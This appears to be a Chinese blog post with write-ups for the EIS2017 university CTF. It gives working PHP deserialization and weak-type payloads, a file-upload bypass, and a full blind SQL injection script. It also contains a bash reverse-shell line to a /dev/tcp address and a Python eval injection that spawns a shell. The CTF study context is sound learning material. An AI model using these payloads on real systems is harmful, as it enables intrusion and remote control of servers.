EIS2017也就是2017年高校网络信息安全管理 运维挑战赛,全国一百多所高校参赛,侥幸拿了个地区三等奖,
事先不知道理论赛占分比,不然就会是二等奖(吐槽),生活没有如果,下次努力吧。
比赛已经结束大概两周了,直到前几天奖杯到了才想起来写下吧,结果拖延到今天。写下来方便以后查看。
总体来说比赛题目不是太难,刚开始的题目都被各位表哥都给秒了。下面就看一下吧。
一、签到题
一个二维码,直接扫下就出来了flag(EIS{2a051b6c88b5a1211655d110259196b8}
)
二、PHP代码审计
说了简单的代码审计,打开就是源码,没有其他过多的套路。
这个题目以前是做过的,先引入flag1.php文件代码,然后通过get方式传递 args变量才能执行if里面的代码,正则表达式的意思是匹配任意 [A-Za-z0-9_] 的字符,就是任意大小写字母和0到9以及下划线组成,这里才是关键eval("var_dump($$args);");百度一下可以知道是可变变量,只需给变量传一个全局数组变量就好了 所以我们构造 args=GLOBALS。链接(http://202.112.26.124:8080/edd1620126f2caeb5c2b3b9452fa2639/index.php?args=GLOBALS),截图如下
三、随机数
打开让填随机数,运气哪有那么好?发现规律是都是三位数字,没有超过1000,干脆爆破,其实也不用写什么脚本,burpsuite就好,抓包,爆破100--999
四、快速计算
算术题,人哪能算那么快,写个脚本吧
import requests
from bs4 import BeautifulSoup
url1 = "http://202.120.7.220:2333/"
url2 = "http://202.120.7.220:2333/index.php"
requ = requests.get(url1)
requ = requ.content
Soup = BeautifulSoup(requ,'lxml')
list = Soup.find('form')
result = eval(list.text[13:-1])
print(result)
post = requests.post(url2,data = {'v' : result})
print(post.text)
截图如下flag(EIS{sdf4we5554})
五、PHP是最好的语言
首先打开啥都没有,扫下,发现(http://202.112.26.124:8080/95fe19724cc6084f08366340c848b791/index.php.bak),bak文件泄露,下载,看到源码,感觉很熟悉,用的是PHP的函数漏洞,找了篇相关的题目(http://www.mamicode.com/info-detail-1458817.html),然后自己构造了payload如下(http://202.112.26.124:8080/95fe19724cc6084f08366340c848b791/index.php
?foo=a:2:{s:6:"param1";s:5:"2018e";s:6:"param2";a:5:{i:0;a:1:{i:0;i:1;}i:1;i:1;i:2;i:2;i:3;i:3;i:4;i:0;}}
&egg[0]=%00MyAns
&egg[1][]=1111)
六、php trick
打开查看源代码,看到源码,简单的看下就知道是变量覆盖,GET提交,然后绕过验证的问题,因此直接构造payload:/index.php?flag=&gift=
这里注意下,没有index.php的话是不出flag的,看到假flag后然后进行移位就可以看到真flag。(EIS{jbfuvsynt})
七、不是管理员也能登陆
Php弱类型,反序列化
让看说明与帮助,那就点开看看呗,看到了部分代码
$test=$_GET['userid']; $test=md5($test); <br> if($test != '0'){ <br> $this->error('用户名有误,请阅读说明与帮助!');
$pwd =$this->_post("password");$data_u = unserialize($pwd);if($data_u['name'] == 'XX' && $data_u['pwd']=='XX') { print_r($flag); }
上述代码可以知道,userid用MD5 0e就可以进行绕过,这里选个值吧s155964671a,password是反序列化,所以构造payload:a:2:{s:4:"name";b:1;s:3:"pwd";b:1;}
在首页进行输入就得到flag
八、文件上传
这个题被队伍的一个老哥拿了一血,上传的时候检测关键字,这个时候需要绕过,burpsuite抓包,更容易分析点。
可以用数组绕过,并且把关键字给分开进行提交,这样就可以进行上传,可以这样构造payload:ext=php&content[]=<?p&content[]=hp%0aphpinfo();
这样会上传成功,得到路径,打开即可得到flag
九、Login
只有一个登陆框,套路肯定是注入了,SQL盲注,位异或,别的运算符和函数都被禁了,直接上脚本
import requests
def getlen(url):
i=1;
while 1:
payload={'uname':"1'^(length(pwd)=%d)^'0"%(i),'pwd':'123456'}
#print payload
reponse=requests.post(url,payload)
text=reponse.content
#print text
if text.find("password error!")!=-1:
break
else:
i=i+1
return i
def getpwd(url,len,list):
ch=""
for i in range(1,len+1):
for c in list:
payload={'uname':"1'^(left(pwd,%d)='%s')^'0"%(i,ch+c),'pwd':'123456'}
reponse=requests.post(url,payload)
#print payload
text=reponse.content
if text.find("password error!")!=-1:
ch=ch+c
print ch
break
else:
pass
if __name__=='__main__':
list=[]
for i in range(10):
list.append(str(i))
for i in range(65,91):
list.append(chr(i))
for i in range(97,123):
list.append(chr(i))
url="http://202.112.26.124:8080/fb69d7b4467e33c71b0153e62f7e2bf0/index.php"
len=getlen(url)
print len
getpwd(url,len,list)
跑出来密码,然后账号admin,加上刚刚跑出的密码登陆就可得到flag。
十、隐藏在黑夜里的秘密
下载下来一个zip压缩包,是个伪加密,打开winhex,搜索所有的504B
然后把后面1400 后的全改成0000 然后密码就没了,提取出来图片即flag
十一、easy crypho
下面的是队友写的了。解密题目,对着给出的代码走一遍就能写出来。下载下来压缩包,两个txt文件,对应着可以写出python脚本。
得到flag:EIS{55a0a84f86a6ad40006f014619577ad3}
十二、igniteMe
逆向题,队友写的,ida打开,找到关键关键位置,分析应用将输入字符串转为HEX,经过一系列转化之后和一个数组进行比较,步骤看脚本:
十三、Reverseme
逆向题,ida打开,找到关键关键位置,流程和上一道题一样,队友直接扔脚本,我也很无奈。
十四、Flagapp
唉,好气都是队友做的,他说发现apk一个文件头部有一点点的小问题,修补dex后签名得到正确apk。逆向解包出两个.so文件。用ida打开其中一个,发现密码就是flag,根据代码生成密码得到输出。
反正我是一愣一愣的,结果输出来,好像flag还有点错误,把最后一位改成了大括号,稍微改了一下就出来了flag。
------------------------------------------------------------------------------下面是没有做出来的,给出别人的解题步骤------------------------------------------------------------------------------
十五、Apache
Hacklu原题
通过__libc_start_main劫持strlen函数来安装后门,满足条件的payload可以被system执行,最后首先发送一个正常的get请求,再发送/index.html?eqeqeqbnbnbnbnbkwkwkwkwhththththqeq=bash_-c_‘bash_-i_>&_/dev/tcp/202.112.50.114/5555_0>&1’获得一个reverse shell,直接cat flag.txt即可。
URL 中需有 ‘dpdpdpamamamamajvjvjvjvgsgsgsgsgpdp’ or ‘eqeqeqbnbnbnbnbkwkwkwkwhththththqeq’,后⾯面跟命令即可,其中下划线会被替换为空格。
十六、SimpleCMS
参考链接http://www.blogsir.com.cn/safe/471.html
十七、DNS001
参考链接http://www.blogsir.com.cn/safe/465.html
十八、验证码
本题逻辑十分简单,请求服务器器⼀个验证码,服务器器返回字符画。请求结果,服务端校验结果。有⼀个隐藏的 help 指令,可以 reconnect,问题在于如何指定 reconnect 的服务器,将发给 ws 服务的 json 中的值依次替换成 [] 可以通过报错信息推断后端逻辑,得到 method 会被带⼊入到 getattr 中,那么必须得是⼀一个类中规定好的⽅方 法才能够带⼊入进来,可行的操作并不不多,测试了__init__
函数,根据错误信息发现可以带⼊两个参数, 因此发包如下
{“method”:”init”,”args”:[ip,port]}
接着调⽤用 reconnect
{“method”:”reconnect”}
此时服务器器上监听的端⼝口已收到信息。
我们继续请求新的验证码,发现服务端向我们请求⼀一个操作符,操作数由服务端⽣生成好了了,因此猜测整个表达式被带⼊入到 eval 中得到返回值,再给客户校验计算结果。那么答案也就显⽽易见了。我们将给客户的操作符定 义为
+__import__('os').system('python\x20/tmp/melody.py')+
那么被带⼊入到后端就会变成
eval("1+__import__('os').system('python\x20/tmp/melody.py')+2")
我们的代码就得到执⾏行行了了,尝试后成功反弹 shell。 最后在 arifmetics.py 中找到 flag。
cat ar*
import asyncio
from hashlib import md5
from random import choice, randint
from threading import Thread
SALT = b"EIS{87a5d7e4aae098be036d6b8035e4}
以上就是2017年高校网络信息安全管理 运维挑战赛的18个比赛题目的writeup。记录一下,相互学习。
任重而道远!
本文链接(http://www.cnblogs.com/Oran9e/p/7860074.html),转载请注明。